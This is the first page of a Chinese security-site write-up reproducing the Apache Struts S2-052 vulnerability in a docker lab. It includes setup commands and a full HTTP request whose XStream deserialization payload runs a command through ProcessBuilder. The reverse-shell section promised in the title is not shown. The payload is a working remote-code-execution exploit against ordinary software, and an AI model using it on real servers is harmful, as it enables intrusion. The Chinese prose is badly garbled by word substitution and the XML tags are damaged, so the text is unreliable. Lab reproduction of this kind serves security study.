欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

Struts S2-052漏洞bug反弹Shell的试验

来源:本站整理 作者:佚名 时间:2017-09-08 TAG: 我要投稿

S2-052曾经爆出几天了,我也凑热闹赶快搭建情况感到了一下。不知其余人是如何的,我这边刚开端测试的时刻,感到能履行的敕令比拟无限:没有回显、创立一个指定内容的文件都很吃力、似乎也反弹不了shell。颠末一阵子的测试,末了办理了这些成绩,上面大概说下我的摸索进程。
一、情况搭建
主机是linux的,间接用docker拉一个别人搭建好的情况……
链接地点: https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-052
详细办法(略过装置和应用docker的步调):
1、拉去镜像到当地
$ docker pull medicean/vulapps:s_struts2_s2-052
2、启动情况
$ docker run -d -p 80:8080 -v /tmp/:/tmp/ medicean/vulapps:s_struts2_s-052
3、拜访 http://localhost/ 便可,能看到如上面这个图,就阐明能够了。

二、破绽复现
应用burpsuite向当地80端口发包
POST /orders HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2408
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1
map>
entry>
     jdk.nashorn.internal.objects.NativeString>
       flags>0flags>
       value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         dataHandler>
           dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             is class="javax.crypto.CipherInputStream">
               cipher class="javax.crypto.NullCipher">
                 initialized>falseinitialized>
                 opmode>0opmode>
                 serviceIterator class="javax.imageio.spi.FilterIterator">
                   iter class="javax.imageio.spi.FilterIterator">
                     iter class="java.util.Collections$EmptyIterator"/>
                     next class="java.lang.ProcessBuilder">
                       command>
string>touchstring>
string>/tmp/test.txtstring>
                       command>
                       redirectErrorStream>falseredirectErrorStream>
                     next>
                   iter>
                   filter class="javax.imageio.ImageIO$ContainsFilter">
                     method>
                       class>java.lang.ProcessBuilderclass>
                       name>startname>
                       parameter-types/>
                     method>
                     name>fooname>

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载